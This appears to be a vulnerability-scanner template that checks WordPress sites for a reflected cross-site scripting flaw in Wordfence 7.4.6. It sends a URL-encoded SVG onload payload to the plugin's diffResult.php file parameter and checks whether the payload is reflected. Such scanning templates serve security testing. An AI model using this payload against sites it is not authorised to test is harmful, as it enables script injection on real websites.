id: wordpress-wordfence-xss

info:
  name: WordPress Wordfence 7.4.6 Cross Site Scripting
  author: madrobot
  severity: medium
  tags: wordpress,wp-plugin,xss,wordfence

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "'>\"<svg/onload=confirm('test')>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header

      - type: status
        status:
          - 200
